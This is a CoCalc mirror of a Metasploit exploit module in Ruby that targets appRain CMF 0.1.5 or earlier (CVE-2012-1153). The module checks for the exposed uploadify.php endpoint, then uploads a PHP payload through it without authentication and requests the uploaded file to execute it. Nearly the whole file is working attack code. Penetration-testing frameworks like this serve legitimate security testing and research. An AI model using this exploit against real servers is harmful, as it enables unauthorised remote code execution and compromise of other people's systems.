Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/apprain_upload_exec.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => "appRain CMF Arbitrary PHP File Upload Vulnerability",
16
'Description' => %q{
17
This module exploits a vulnerability found in appRain's Content Management
18
Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a
19
malicious user can upload a file to the uploads/ directory without any
20
authentication, which results in arbitrary code execution.
21
},
22
'License' => MSF_LICENSE,
23
'Author' => [
24
'EgiX', # Discovery, PoC
25
'sinn3r' # Metasploit
26
],
27
'References' => [
28
['CVE', '2012-1153'],
29
['OSVDB', '78473'],
30
['EDB', '18392'],
31
['BID', '51576']
32
],
33
'Payload' => {
34
'BadChars' => "\x00"
35
},
36
'DefaultOptions' => {
37
'EXITFUNC' => 'thread'
38
},
39
'Platform' => ['php'],
40
'Arch' => ARCH_PHP,
41
'Targets' => [
42
['appRain 0.1.5 or less', {}]
43
],
44
'Privileged' => false,
45
'DisclosureDate' => '2012-01-19',
46
'DefaultTarget' => 0,
47
'Notes' => {
48
'Reliability' => UNKNOWN_RELIABILITY,
49
'Stability' => UNKNOWN_STABILITY,
50
'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
}
52
)
53
)
54
55
register_options(
56
[
57
OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])
58
]
59
)
60
end
61
62
def check
63
uri = target_uri.path
64
uri << '/' if uri[-1, 1] != '/'
65
66
res = send_request_cgi({
67
'method' => 'GET',
68
'uri' => normalize_uri(uri, 'addons/uploadify/uploadify.php')
69
})
70
71
if res and res.code == 200 and res.body.empty?
72
return Exploit::CheckCode::Appears
73
else
74
return Exploit::CheckCode::Safe
75
end
76
end
77
78
def exploit
79
uri = target_uri.path
80
81
peer = "#{rhost}:#{rport}"
82
payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'
83
84
post_data = "--o0oOo0o\r\n"
85
post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"
86
post_data << "<?php "
87
post_data << payload.encoded
88
post_data << " ?>\r\n"
89
post_data << "--o0oOo0o\r\n"
90
91
print_status("Sending PHP payload (#{payload_name})")
92
res = send_request_cgi({
93
'method' => 'POST',
94
'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"),
95
'ctype' => 'multipart/form-data; boundary=o0oOo0o',
96
'data' => post_data
97
})
98
99
# If the server returns 200 and the body contains our payload name,
100
# we assume we uploaded the malicious file successfully
101
if not res or res.code != 200 or res.body !~ /#{payload_name}/
102
print_error("File wasn't uploaded, aborting!")
103
return
104
end
105
106
print_status("Executing PHP payload (#{payload_name})")
107
# Execute our payload
108
res = send_request_cgi({
109
'method' => 'GET',
110
'uri' => normalize_uri(uri, "addons/uploadify/uploads/#{payload_name}")
111
})
112
113
# If we don't get a 200 when we request our malicious payload, we suspect
114
# we don't have a shell, either. Print the status code for debugging purposes.
115
if res and res.code != 200
116
print_status("Server returned #{res.code.to_s}")
117
end
118
end
119
end
120
121